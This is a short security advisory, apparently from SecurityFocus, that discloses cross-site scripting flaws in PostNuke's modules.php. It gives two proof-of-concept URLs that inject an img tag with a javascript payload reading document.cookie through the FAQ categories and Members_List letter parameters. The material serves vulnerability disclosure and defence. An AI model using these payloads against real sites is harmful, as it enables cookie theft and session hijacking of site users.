PostNuke Modules.PHP Multiple Cross-Site Scripting Vulnerabilities

The follow proof of concepts have been supplied:

http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i
d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent
_id=0

http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert
(document.cookie);%3E&op=modload&name=Members_List&file=index


 

Privacy Statement
Copyright 2010, SecurityFocus